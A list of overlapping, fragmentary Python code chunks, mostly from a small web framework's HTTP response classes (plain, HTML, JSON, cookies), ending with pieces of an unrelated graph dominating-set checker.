"raise TypeError(\"body must be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if body is",
"content_type=\"text/plain\", ): if not isinstance(status_code, int): raise TypeError(\"status_code must be int type.\") if",
"): hdr_elem = dict() hdr_elem[\"name\"] = \"Set-Cookie\" value = header_value_from_cookie(name, value, **kwards) hdr_elem[\"value\"]",
"value self._header.append(hdr_elem) class PlainResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body",
"not None else bytes() @property def status_code(self): return self._status_code @property def header(self): return",
"be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if body is not None else",
"from .cookie import * from .exceptions import * class _Response(_fly_response): @property def status_code(self):",
"hdr_elem = dict() hdr_elem[\"name\"] = \"Set-Cookie\" value = header_value_from_cookie(name, value, **kwards) hdr_elem[\"value\"] =",
"bytes type.\") self._status_code = status_code self._content_type = content_type self._header = list() self._body =",
"not isinstance(body, str): raise TypeError(\"body must be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\")",
"def status_code(self): raise NotImplementedError( \"_Response must have status_code attr\" ) @property def header(self):",
"NotImplementedError( \"_Response must have status_code attr\" ) @property def header(self): raise NotImplementedError( \"_Response",
"if body is not None and not isinstance(body, str): raise TypeError(\"body must be",
"* from .exceptions import * class _Response(_fly_response): @property def status_code(self): raise NotImplementedError( \"_Response",
"header, body.encode(\"utf-8\") if isinstance(body, str) else None, content_type=\"text/plain\" ) class HTMLResponse(Response): def __init__(",
"must be list type.\") if not isinstance(content_type, str): raise TypeError(\"content_type must be str",
"attr\" ) class Response(_Response): \"\"\" All Response subclass must have 5 attributes. -",
"import json from .cookie import * from .exceptions import * class _Response(_fly_response): @property",
"def status_code(self): return self._status_code @property def header(self): return self._header @property def header_len(self): return",
"status_code: default 200 - header: default: [] - body: default: bytes() - content_type:",
"TypeError(\"status_code must be int type.\") if header is not None and not isinstance(header,",
"self, status_code=200, header=None, body=None, content_type=\"text/plain\", ): if not isinstance(status_code, int): raise TypeError(\"status_code must",
"def body(self): raise NotImplementedError( \"_Response must have body attr\" ) @property def content_type(self):",
"\"_Response must have content_type attr\" ) class Response(_Response): \"\"\" All Response subclass must",
"is not None and not isinstance(header, (list)): raise TypeError(\"status_code must be list type.\")",
"value): hdr_elem = dict() hdr_elem[\"name\"] = name hdr_elem[\"value\"] = value self._header.append(hdr_elem) def set_cookie(",
"None and not isinstance(body, (bytes)): raise TypeError(\"body must be bytes type.\") self._status_code =",
"@property def header(self): raise NotImplementedError( \"_Response must have header attr\" ) @property def",
"set_cookie( self, name, value, **kwards ): hdr_elem = dict() hdr_elem[\"name\"] = \"Set-Cookie\" value",
"must be bytes type.\") self._status_code = status_code self._content_type = content_type self._header = list()",
"name, value): hdr_elem = dict() hdr_elem[\"name\"] = name hdr_elem[\"value\"] = value self._header.append(hdr_elem) def",
"int type.\") if header is not None and not isinstance(header, (list)): raise TypeError(\"status_code",
"status_code, header, body.encode(\"utf-8\") if body is not None else None, content_type=\"text/html\" ) class",
"= value self._header.append(hdr_elem) def set_cookie( self, name, value, **kwards ): hdr_elem = dict()",
"if not isinstance(content_type, str): raise TypeError(\"content_type must be str type.\") if body is",
"subclass must have 5 attributes. - status_code: default 200 - header: default: []",
"must be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if body is not None",
"from ._fly_server import _fly_response import json from .cookie import * from .exceptions import",
"name, value, **kwards ): hdr_elem = dict() hdr_elem[\"name\"] = \"Set-Cookie\" value = header_value_from_cookie(name,",
"header attr\" ) @property def body(self): raise NotImplementedError( \"_Response must have body attr\"",
"header_len(self): return len(self._header) @property def body(self): return self._body @property def content_type(self): return self._content_type",
"HTMLResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body is not None",
"Response subclass must have 5 attributes. - status_code: default 200 - header: default:",
"hdr_elem[\"name\"] = name hdr_elem[\"value\"] = value self._header.append(hdr_elem) def set_cookie( self, name, value, **kwards",
"value self._header.append(hdr_elem) def set_cookie( self, name, value, **kwards ): hdr_elem = dict() hdr_elem[\"name\"]",
"All Response subclass must have 5 attributes. - status_code: default 200 - header:",
"self._status_code @property def header(self): return self._header @property def header_len(self): return len(self._header) @property def",
"): if body is not None and not isinstance(body, str): raise TypeError(\"body must",
"attr\" ) @property def header_len(self): raise NotImplementedError( \"_Response must have header attr\" )",
"__init__( self, status_code=200, header=None, body=None, ): if body is not None and not",
"must be int type.\") if header is not None and not isinstance(header, (list)):",
"= body if body is not None else bytes() @property def status_code(self): return",
"@property def content_type(self): return self._content_type def add_header(self, name, value): hdr_elem = dict() hdr_elem[\"name\"]",
"raise NotImplementedError( \"_Response must have body attr\" ) @property def content_type(self): raise NotImplementedError(",
"from .exceptions import * class _Response(_fly_response): @property def status_code(self): raise NotImplementedError( \"_Response must",
"return self._header @property def header_len(self): return len(self._header) @property def body(self): return self._body @property",
"body is not None and len(body) > 0 \\ else None, content_type=\"application/json\" )",
"@property def body(self): raise NotImplementedError( \"_Response must have body attr\" ) @property def",
"list/dict type.\") super().__init__( status_code, header, json.dumps(body).encode(\"utf-8\") \\ if body is not None and",
".cookie import * from .exceptions import * class _Response(_fly_response): @property def status_code(self): raise",
"header, json.dumps(body).encode(\"utf-8\") \\ if body is not None and len(body) > 0 \\",
"): if not isinstance(status_code, int): raise TypeError(\"status_code must be int type.\") if header",
"isinstance(status_code, int): raise TypeError(\"status_code must be int type.\") if header is not None",
"**kwards) hdr_elem[\"value\"] = value self._header.append(hdr_elem) class PlainResponse(Response): def __init__( self, status_code=200, header=None, body=None,",
"TypeError(\"body must be list/dict type.\") super().__init__( status_code, header, json.dumps(body).encode(\"utf-8\") \\ if body is",
"TypeError(\"status_code must be list type.\") if not isinstance(content_type, str): raise TypeError(\"content_type must be",
"def content_type(self): raise NotImplementedError( \"_Response must have content_type attr\" ) class Response(_Response): \"\"\"",
"@property def status_code(self): return self._status_code @property def header(self): return self._header @property def header_len(self):",
"must be list/dict type.\") super().__init__( status_code, header, json.dumps(body).encode(\"utf-8\") \\ if body is not",
"def body(self): return self._body @property def content_type(self): return self._content_type def add_header(self, name, value):",
"not isinstance(body, (bytes)): raise TypeError(\"body must be bytes type.\") self._status_code = status_code self._content_type",
"def header_len(self): raise NotImplementedError( \"_Response must have header attr\" ) @property def body(self):",
"else None, content_type=\"text/html\" ) class JSONResponse(Response): def __init__( self, status_code=200, header=None, body=None, ):",
"def __init__( self, status_code=200, header=None, body=None, ): if body is not None and",
"header=None, body=None, ): if body is not None and not isinstance(body, str): raise",
"status_code(self): return self._status_code @property def header(self): return self._header @property def header_len(self): return len(self._header)",
"None and not isinstance(body, str): raise TypeError(\"body must be str type.\") super().__init__( status_code,",
"= list() self._body = body if body is not None else bytes() @property",
"class PlainResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body is not",
"None, content_type=\"text/html\" ) class JSONResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if",
"not None and not isinstance(body, dict) and \\ not isinstance(body, list): raise TypeError(\"body",
"(list)): raise TypeError(\"status_code must be list type.\") if not isinstance(content_type, str): raise TypeError(\"content_type",
"None else None, content_type=\"text/html\" ) class JSONResponse(Response): def __init__( self, status_code=200, header=None, body=None,",
"default 200 - header: default: [] - body: default: bytes() - content_type: default:",
"content_type self._header = list() self._body = body if body is not None else",
"self._header.append(hdr_elem) def set_cookie( self, name, value, **kwards ): hdr_elem = dict() hdr_elem[\"name\"] =",
"body is not None and not isinstance(body, dict) and \\ not isinstance(body, list):",
"return len(self._header) @property def body(self): return self._body @property def content_type(self): return self._content_type def",
"value, **kwards) hdr_elem[\"value\"] = value self._header.append(hdr_elem) class PlainResponse(Response): def __init__( self, status_code=200, header=None,",
"def content_type(self): return self._content_type def add_header(self, name, value): hdr_elem = dict() hdr_elem[\"name\"] =",
"return self._status_code @property def header(self): return self._header @property def header_len(self): return len(self._header) @property",
"json from .cookie import * from .exceptions import * class _Response(_fly_response): @property def",
"status_code attr\" ) @property def header(self): raise NotImplementedError( \"_Response must have header attr\"",
"NotImplementedError( \"_Response must have header attr\" ) @property def header_len(self): raise NotImplementedError( \"_Response",
"dict) and \\ not isinstance(body, list): raise TypeError(\"body must be list/dict type.\") super().__init__(",
"status_code, header, body.encode(\"utf-8\") if isinstance(body, str) else None, content_type=\"text/plain\" ) class HTMLResponse(Response): def",
"and \\ not isinstance(body, list): raise TypeError(\"body must be list/dict type.\") super().__init__( status_code,",
"must have header attr\" ) @property def header_len(self): raise NotImplementedError( \"_Response must have",
"- status_code: default 200 - header: default: [] - body: default: bytes() -",
"value = header_value_from_cookie(name, value, **kwards) hdr_elem[\"value\"] = value self._header.append(hdr_elem) class PlainResponse(Response): def __init__(",
"attr\" ) @property def body(self): raise NotImplementedError( \"_Response must have body attr\" )",
"class _Response(_fly_response): @property def status_code(self): raise NotImplementedError( \"_Response must have status_code attr\" )",
"header: default: [] - body: default: bytes() - content_type: default: text/plain \"\"\" def",
"and not isinstance(body, (bytes)): raise TypeError(\"body must be bytes type.\") self._status_code = status_code",
") class HTMLResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body is",
"NotImplementedError( \"_Response must have content_type attr\" ) class Response(_Response): \"\"\" All Response subclass",
"body=None, content_type=\"text/plain\", ): if not isinstance(status_code, int): raise TypeError(\"status_code must be int type.\")",
"\\ not isinstance(body, list): raise TypeError(\"body must be list/dict type.\") super().__init__( status_code, header,",
") @property def header(self): raise NotImplementedError( \"_Response must have header attr\" ) @property",
"return self._content_type def add_header(self, name, value): hdr_elem = dict() hdr_elem[\"name\"] = name hdr_elem[\"value\"]",
"body is not None else bytes() @property def status_code(self): return self._status_code @property def",
"must have content_type attr\" ) class Response(_Response): \"\"\" All Response subclass must have",
"isinstance(body, str) else None, content_type=\"text/plain\" ) class HTMLResponse(Response): def __init__( self, status_code=200, header=None,",
"list() self._body = body if body is not None else bytes() @property def",
"\"Set-Cookie\" value = header_value_from_cookie(name, value, **kwards) hdr_elem[\"value\"] = value self._header.append(hdr_elem) class PlainResponse(Response): def",
"def header_len(self): return len(self._header) @property def body(self): return self._body @property def content_type(self): return",
"dict() hdr_elem[\"name\"] = name hdr_elem[\"value\"] = value self._header.append(hdr_elem) def set_cookie( self, name, value,",
"default: text/plain \"\"\" def __init__( self, status_code=200, header=None, body=None, content_type=\"text/plain\", ): if not",
"<filename>fly/response.py from ._fly_server import _fly_response import json from .cookie import * from .exceptions",
"def set_cookie( self, name, value, **kwards ): hdr_elem = dict() hdr_elem[\"name\"] = \"Set-Cookie\"",
"content_type=\"text/plain\" ) class HTMLResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body",
"body is not None and not isinstance(body, (bytes)): raise TypeError(\"body must be bytes",
"add_header(self, name, value): hdr_elem = dict() hdr_elem[\"name\"] = name hdr_elem[\"value\"] = value self._header.append(hdr_elem)",
"must be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if isinstance(body, str) else None,",
"self, status_code=200, header=None, body=None, ): if body is not None and not isinstance(body,",
"be list type.\") if not isinstance(content_type, str): raise TypeError(\"content_type must be str type.\")",
"hdr_elem = dict() hdr_elem[\"name\"] = name hdr_elem[\"value\"] = value self._header.append(hdr_elem) def set_cookie( self,",
"def __init__( self, status_code=200, header=None, body=None, content_type=\"text/plain\", ): if not isinstance(status_code, int): raise",
"self._header.append(hdr_elem) class PlainResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body is",
"default: [] - body: default: bytes() - content_type: default: text/plain \"\"\" def __init__(",
"- content_type: default: text/plain \"\"\" def __init__( self, status_code=200, header=None, body=None, content_type=\"text/plain\", ):",
"= dict() hdr_elem[\"name\"] = \"Set-Cookie\" value = header_value_from_cookie(name, value, **kwards) hdr_elem[\"value\"] = value",
"not isinstance(header, (list)): raise TypeError(\"status_code must be list type.\") if not isinstance(content_type, str):",
"if body is not None else None, content_type=\"text/html\" ) class JSONResponse(Response): def __init__(",
"str) else None, content_type=\"text/plain\" ) class HTMLResponse(Response): def __init__( self, status_code=200, header=None, body=None,",
"body attr\" ) @property def content_type(self): raise NotImplementedError( \"_Response must have content_type attr\"",
"= status_code self._content_type = content_type self._header = list() self._body = body if body",
"if body is not None and not isinstance(body, dict) and \\ not isinstance(body,",
"raise TypeError(\"content_type must be str type.\") if body is not None and not",
"str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if body is not None else None,",
"str): raise TypeError(\"body must be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if isinstance(body,",
"- header: default: [] - body: default: bytes() - content_type: default: text/plain \"\"\"",
"isinstance(body, (bytes)): raise TypeError(\"body must be bytes type.\") self._status_code = status_code self._content_type =",
"status_code=200, header=None, body=None, content_type=\"text/plain\", ): if not isinstance(status_code, int): raise TypeError(\"status_code must be",
"None else bytes() @property def status_code(self): return self._status_code @property def header(self): return self._header",
"value, **kwards ): hdr_elem = dict() hdr_elem[\"name\"] = \"Set-Cookie\" value = header_value_from_cookie(name, value,",
"raise TypeError(\"body must be bytes type.\") self._status_code = status_code self._content_type = content_type self._header",
"attr\" ) @property def header(self): raise NotImplementedError( \"_Response must have header attr\" )",
"def add_header(self, name, value): hdr_elem = dict() hdr_elem[\"name\"] = name hdr_elem[\"value\"] = value",
"content_type(self): return self._content_type def add_header(self, name, value): hdr_elem = dict() hdr_elem[\"name\"] = name",
"be bytes type.\") self._status_code = status_code self._content_type = content_type self._header = list() self._body",
"= name hdr_elem[\"value\"] = value self._header.append(hdr_elem) def set_cookie( self, name, value, **kwards ):",
"be str type.\") if body is not None and not isinstance(body, (bytes)): raise",
"header_value_from_cookie(name, value, **kwards) hdr_elem[\"value\"] = value self._header.append(hdr_elem) class PlainResponse(Response): def __init__( self, status_code=200,",
"not None and not isinstance(body, str): raise TypeError(\"body must be str type.\") super().__init__(",
"\"\"\" def __init__( self, status_code=200, header=None, body=None, content_type=\"text/plain\", ): if not isinstance(status_code, int):",
"list): raise TypeError(\"body must be list/dict type.\") super().__init__( status_code, header, json.dumps(body).encode(\"utf-8\") \\ if",
"__init__( self, status_code=200, header=None, body=None, content_type=\"text/plain\", ): if not isinstance(status_code, int): raise TypeError(\"status_code",
"int): raise TypeError(\"status_code must be int type.\") if header is not None and",
"and not isinstance(body, str): raise TypeError(\"body must be str type.\") super().__init__( status_code, header,",
"super().__init__( status_code, header, json.dumps(body).encode(\"utf-8\") \\ if body is not None and len(body) >",
"TypeError(\"content_type must be str type.\") if body is not None and not isinstance(body,",
"not None else None, content_type=\"text/html\" ) class JSONResponse(Response): def __init__( self, status_code=200, header=None,",
"\"_Response must have header attr\" ) @property def header_len(self): raise NotImplementedError( \"_Response must",
"have content_type attr\" ) class Response(_Response): \"\"\" All Response subclass must have 5",
"hdr_elem[\"value\"] = value self._header.append(hdr_elem) class PlainResponse(Response): def __init__( self, status_code=200, header=None, body=None, ):",
"_fly_response import json from .cookie import * from .exceptions import * class _Response(_fly_response):",
"self._status_code = status_code self._content_type = content_type self._header = list() self._body = body if",
"not isinstance(body, list): raise TypeError(\"body must be list/dict type.\") super().__init__( status_code, header, json.dumps(body).encode(\"utf-8\")",
"JSONResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body is not None",
"header(self): return self._header @property def header_len(self): return len(self._header) @property def body(self): return self._body",
"= header_value_from_cookie(name, value, **kwards) hdr_elem[\"value\"] = value self._header.append(hdr_elem) class PlainResponse(Response): def __init__( self,",
"@property def status_code(self): raise NotImplementedError( \"_Response must have status_code attr\" ) @property def",
"must have status_code attr\" ) @property def header(self): raise NotImplementedError( \"_Response must have",
"type.\") if body is not None and not isinstance(body, (bytes)): raise TypeError(\"body must",
"import * from .exceptions import * class _Response(_fly_response): @property def status_code(self): raise NotImplementedError(",
"5 attributes. - status_code: default 200 - header: default: [] - body: default:",
"header attr\" ) @property def header_len(self): raise NotImplementedError( \"_Response must have header attr\"",
"else bytes() @property def status_code(self): return self._status_code @property def header(self): return self._header @property",
"have status_code attr\" ) @property def header(self): raise NotImplementedError( \"_Response must have header",
"@property def body(self): return self._body @property def content_type(self): return self._content_type def add_header(self, name,",
"be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if isinstance(body, str) else None, content_type=\"text/plain\"",
"content_type=\"text/html\" ) class JSONResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body",
"body: default: bytes() - content_type: default: text/plain \"\"\" def __init__( self, status_code=200, header=None,",
"super().__init__( status_code, header, body.encode(\"utf-8\") if body is not None else None, content_type=\"text/html\" )",
"dict() hdr_elem[\"name\"] = \"Set-Cookie\" value = header_value_from_cookie(name, value, **kwards) hdr_elem[\"value\"] = value self._header.append(hdr_elem)",
"name hdr_elem[\"value\"] = value self._header.append(hdr_elem) def set_cookie( self, name, value, **kwards ): hdr_elem",
"def header(self): return self._header @property def header_len(self): return len(self._header) @property def body(self): return",
"header is not None and not isinstance(header, (list)): raise TypeError(\"status_code must be list",
"str): raise TypeError(\"body must be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if body",
"body(self): return self._body @property def content_type(self): return self._content_type def add_header(self, name, value): hdr_elem",
"content_type attr\" ) class Response(_Response): \"\"\" All Response subclass must have 5 attributes.",
"TypeError(\"body must be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if isinstance(body, str) else",
"class HTMLResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body is not",
"._fly_server import _fly_response import json from .cookie import * from .exceptions import *",
"attr\" ) @property def content_type(self): raise NotImplementedError( \"_Response must have content_type attr\" )",
".exceptions import * class _Response(_fly_response): @property def status_code(self): raise NotImplementedError( \"_Response must have",
"type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if isinstance(body, str) else None, content_type=\"text/plain\" ) class",
"is not None and not isinstance(body, (bytes)): raise TypeError(\"body must be bytes type.\")",
"body=None, ): if body is not None and not isinstance(body, dict) and \\",
"NotImplementedError( \"_Response must have header attr\" ) @property def body(self): raise NotImplementedError( \"_Response",
"@property def header(self): return self._header @property def header_len(self): return len(self._header) @property def body(self):",
"type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if body is not None else None, content_type=\"text/html\"",
"content_type: default: text/plain \"\"\" def __init__( self, status_code=200, header=None, body=None, content_type=\"text/plain\", ): if",
"= content_type self._header = list() self._body = body if body is not None",
"default: bytes() - content_type: default: text/plain \"\"\" def __init__( self, status_code=200, header=None, body=None,",
"have body attr\" ) @property def content_type(self): raise NotImplementedError( \"_Response must have content_type",
"not isinstance(content_type, str): raise TypeError(\"content_type must be str type.\") if body is not",
"class JSONResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body is not",
"list type.\") if not isinstance(content_type, str): raise TypeError(\"content_type must be str type.\") if",
"isinstance(content_type, str): raise TypeError(\"content_type must be str type.\") if body is not None",
"[] - body: default: bytes() - content_type: default: text/plain \"\"\" def __init__( self,",
"raise NotImplementedError( \"_Response must have content_type attr\" ) class Response(_Response): \"\"\" All Response",
"else None, content_type=\"text/plain\" ) class HTMLResponse(Response): def __init__( self, status_code=200, header=None, body=None, ):",
"be int type.\") if header is not None and not isinstance(header, (list)): raise",
"PlainResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body is not None",
"attributes. - status_code: default 200 - header: default: [] - body: default: bytes()",
"raise TypeError(\"body must be list/dict type.\") super().__init__( status_code, header, json.dumps(body).encode(\"utf-8\") \\ if body",
"not isinstance(status_code, int): raise TypeError(\"status_code must be int type.\") if header is not",
"\"_Response must have header attr\" ) @property def body(self): raise NotImplementedError( \"_Response must",
"(bytes)): raise TypeError(\"body must be bytes type.\") self._status_code = status_code self._content_type = content_type",
"status_code=200, header=None, body=None, ): if body is not None and not isinstance(body, dict)",
"self._body @property def content_type(self): return self._content_type def add_header(self, name, value): hdr_elem = dict()",
"must have body attr\" ) @property def content_type(self): raise NotImplementedError( \"_Response must have",
"TypeError(\"body must be bytes type.\") self._status_code = status_code self._content_type = content_type self._header =",
"type.\") if not isinstance(content_type, str): raise TypeError(\"content_type must be str type.\") if body",
") @property def body(self): raise NotImplementedError( \"_Response must have body attr\" ) @property",
") class Response(_Response): \"\"\" All Response subclass must have 5 attributes. - status_code:",
"be list/dict type.\") super().__init__( status_code, header, json.dumps(body).encode(\"utf-8\") \\ if body is not None",
"type.\") super().__init__( status_code, header, json.dumps(body).encode(\"utf-8\") \\ if body is not None and len(body)",
"type.\") if header is not None and not isinstance(header, (list)): raise TypeError(\"status_code must",
"body is not None else None, content_type=\"text/html\" ) class JSONResponse(Response): def __init__( self,",
"self._header @property def header_len(self): return len(self._header) @property def body(self): return self._body @property def",
"None and not isinstance(body, dict) and \\ not isinstance(body, list): raise TypeError(\"body must",
"raise NotImplementedError( \"_Response must have header attr\" ) @property def body(self): raise NotImplementedError(",
"body is not None and not isinstance(body, str): raise TypeError(\"body must be str",
"TypeError(\"body must be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if body is not",
"and not isinstance(body, dict) and \\ not isinstance(body, list): raise TypeError(\"body must be",
"= \"Set-Cookie\" value = header_value_from_cookie(name, value, **kwards) hdr_elem[\"value\"] = value self._header.append(hdr_elem) class PlainResponse(Response):",
"- body: default: bytes() - content_type: default: text/plain \"\"\" def __init__( self, status_code=200,",
"raise TypeError(\"status_code must be int type.\") if header is not None and not",
"None, content_type=\"text/plain\" ) class HTMLResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if",
"isinstance(body, list): raise TypeError(\"body must be list/dict type.\") super().__init__( status_code, header, json.dumps(body).encode(\"utf-8\") \\",
"status_code=200, header=None, body=None, ): if body is not None and not isinstance(body, str):",
"if isinstance(body, str) else None, content_type=\"text/plain\" ) class HTMLResponse(Response): def __init__( self, status_code=200,",
"and not isinstance(header, (list)): raise TypeError(\"status_code must be list type.\") if not isinstance(content_type,",
"import * class _Response(_fly_response): @property def status_code(self): raise NotImplementedError( \"_Response must have status_code",
"**kwards ): hdr_elem = dict() hdr_elem[\"name\"] = \"Set-Cookie\" value = header_value_from_cookie(name, value, **kwards)",
"isinstance(body, dict) and \\ not isinstance(body, list): raise TypeError(\"body must be list/dict type.\")",
"if header is not None and not isinstance(header, (list)): raise TypeError(\"status_code must be",
"body=None, ): if body is not None and not isinstance(body, str): raise TypeError(\"body",
"self._header = list() self._body = body if body is not None else bytes()",
"raise TypeError(\"status_code must be list type.\") if not isinstance(content_type, str): raise TypeError(\"content_type must",
"str type.\") if body is not None and not isinstance(body, (bytes)): raise TypeError(\"body",
"if body is not None and not isinstance(body, (bytes)): raise TypeError(\"body must be",
"_Response(_fly_response): @property def status_code(self): raise NotImplementedError( \"_Response must have status_code attr\" ) @property",
") @property def content_type(self): raise NotImplementedError( \"_Response must have content_type attr\" ) class",
"bytes() @property def status_code(self): return self._status_code @property def header(self): return self._header @property def",
"self._content_type = content_type self._header = list() self._body = body if body is not",
"self._content_type def add_header(self, name, value): hdr_elem = dict() hdr_elem[\"name\"] = name hdr_elem[\"value\"] =",
"content_type(self): raise NotImplementedError( \"_Response must have content_type attr\" ) class Response(_Response): \"\"\" All",
"None and not isinstance(header, (list)): raise TypeError(\"status_code must be list type.\") if not",
"hdr_elem[\"value\"] = value self._header.append(hdr_elem) def set_cookie( self, name, value, **kwards ): hdr_elem =",
"is not None and not isinstance(body, dict) and \\ not isinstance(body, list): raise",
"@property def header_len(self): return len(self._header) @property def body(self): return self._body @property def content_type(self):",
"status_code self._content_type = content_type self._header = list() self._body = body if body is",
"\"_Response must have body attr\" ) @property def content_type(self): raise NotImplementedError( \"_Response must",
"* class _Response(_fly_response): @property def status_code(self): raise NotImplementedError( \"_Response must have status_code attr\"",
"= value self._header.append(hdr_elem) class PlainResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if",
"not None and not isinstance(header, (list)): raise TypeError(\"status_code must be list type.\") if",
"header, body.encode(\"utf-8\") if body is not None else None, content_type=\"text/html\" ) class JSONResponse(Response):",
"raise NotImplementedError( \"_Response must have status_code attr\" ) @property def header(self): raise NotImplementedError(",
"not isinstance(body, dict) and \\ not isinstance(body, list): raise TypeError(\"body must be list/dict",
"status_code, header, json.dumps(body).encode(\"utf-8\") \\ if body is not None and len(body) > 0",
"must be str type.\") if body is not None and not isinstance(body, (bytes)):",
"bytes() - content_type: default: text/plain \"\"\" def __init__( self, status_code=200, header=None, body=None, content_type=\"text/plain\",",
"= dict() hdr_elem[\"name\"] = name hdr_elem[\"value\"] = value self._header.append(hdr_elem) def set_cookie( self, name,"
] |
[
"if (S[i] in NAV): NAV.remove(S[i]) return NAV def Flatten(L): Flat=[] for sub in",
"1): NA.append(i) i=i-1 return GetNonAdjacents(V,NA,i,s) if __name__ == \"__main__\": A=[ [0,1,1,0,0], [1,0,1,1,0], [1,1,0,0,1],",
"(S[i] in NAV): NAV.remove(S[i]) return NAV def Flatten(L): Flat=[] for sub in L:",
"(v1==v2): return False return A[v1][v2] == 1 def GetNonAdjacents(V,NA,i,s): if (i==-1): return NA",
"for j in range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i]) if (is_adj is True): any_adj=True if (any_adj is",
"A[v1][v2] == 1 def GetNonAdjacents(V,NA,i,s): if (i==-1): return NA cell=V[i] if (i !=s",
"True def RemoveS(NAV,S): NAV=Flatten(NAV) for i in range(len(S)): if (S[i] in NAV): NAV.remove(S[i])",
"def Check(A,S,NAV): for i in range(len(NAV)): any_adj=False for j in range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i]) if",
"i in range(len(NAV)): any_adj=False for j in range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i]) if (is_adj is True):",
"sub: Flat.append(val) return Flat def IsAdjacent(A,v1,v2): if (v1==v2): return False return A[v1][v2] ==",
"for i in range(len(S)): dominator=S[i] vertex=A[dominator] NA=GetNonAdjacents(vertex,[],len(vertex)-1,dominator) NAV.append(NA) ToCheck=RemoveS(NAV,S) return Check(A,S,ToCheck) def Check(A,S,NAV):",
"def Flatten(L): Flat=[] for sub in L: for val in sub: Flat.append(val) return",
"<filename>dominating_set_testing.py<gh_stars>1-10 def IsDominatingSet(A,S): NAV=[] for i in range(len(S)): dominator=S[i] vertex=A[dominator] NA=GetNonAdjacents(vertex,[],len(vertex)-1,dominator) NAV.append(NA) ToCheck=RemoveS(NAV,S)",
"NAV): NAV.remove(S[i]) return NAV def Flatten(L): Flat=[] for sub in L: for val",
"range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i]) if (is_adj is True): any_adj=True if (any_adj is False): return False",
"is_adj=IsAdjacent(A,S[j],NAV[i]) if (is_adj is True): any_adj=True if (any_adj is False): return False return",
"and cell != 1): NA.append(i) i=i-1 return GetNonAdjacents(V,NA,i,s) if __name__ == \"__main__\": A=[",
"cell != 1): NA.append(i) i=i-1 return GetNonAdjacents(V,NA,i,s) if __name__ == \"__main__\": A=[ [0,1,1,0,0],",
"j in range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i]) if (is_adj is True): any_adj=True if (any_adj is False):",
"in sub: Flat.append(val) return Flat def IsAdjacent(A,v1,v2): if (v1==v2): return False return A[v1][v2]",
"ToCheck=RemoveS(NAV,S) return Check(A,S,ToCheck) def Check(A,S,NAV): for i in range(len(NAV)): any_adj=False for j in",
"NA cell=V[i] if (i !=s and cell != 1): NA.append(i) i=i-1 return GetNonAdjacents(V,NA,i,s)",
"range(len(NAV)): any_adj=False for j in range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i]) if (is_adj is True): any_adj=True if",
"False): return False return True def RemoveS(NAV,S): NAV=Flatten(NAV) for i in range(len(S)): if",
"if (is_adj is True): any_adj=True if (any_adj is False): return False return True",
"def IsDominatingSet(A,S): NAV=[] for i in range(len(S)): dominator=S[i] vertex=A[dominator] NA=GetNonAdjacents(vertex,[],len(vertex)-1,dominator) NAV.append(NA) ToCheck=RemoveS(NAV,S) return",
"True): any_adj=True if (any_adj is False): return False return True def RemoveS(NAV,S): NAV=Flatten(NAV)",
"i in range(len(S)): if (S[i] in NAV): NAV.remove(S[i]) return NAV def Flatten(L): Flat=[]",
"Check(A,S,NAV): for i in range(len(NAV)): any_adj=False for j in range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i]) if (is_adj",
"def IsAdjacent(A,v1,v2): if (v1==v2): return False return A[v1][v2] == 1 def GetNonAdjacents(V,NA,i,s): if",
"if (i !=s and cell != 1): NA.append(i) i=i-1 return GetNonAdjacents(V,NA,i,s) if __name__",
"Check(A,S,ToCheck) def Check(A,S,NAV): for i in range(len(NAV)): any_adj=False for j in range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i])",
"NAV.append(NA) ToCheck=RemoveS(NAV,S) return Check(A,S,ToCheck) def Check(A,S,NAV): for i in range(len(NAV)): any_adj=False for j",
"!=s and cell != 1): NA.append(i) i=i-1 return GetNonAdjacents(V,NA,i,s) if __name__ == \"__main__\":",
"in NAV): NAV.remove(S[i]) return NAV def Flatten(L): Flat=[] for sub in L: for",
"is True): any_adj=True if (any_adj is False): return False return True def RemoveS(NAV,S):",
"False return A[v1][v2] == 1 def GetNonAdjacents(V,NA,i,s): if (i==-1): return NA cell=V[i] if",
"in range(len(S)): if (S[i] in NAV): NAV.remove(S[i]) return NAV def Flatten(L): Flat=[] for",
"L: for val in sub: Flat.append(val) return Flat def IsAdjacent(A,v1,v2): if (v1==v2): return",
"in L: for val in sub: Flat.append(val) return Flat def IsAdjacent(A,v1,v2): if (v1==v2):",
"if (any_adj is False): return False return True def RemoveS(NAV,S): NAV=Flatten(NAV) for i",
"return Flat def IsAdjacent(A,v1,v2): if (v1==v2): return False return A[v1][v2] == 1 def",
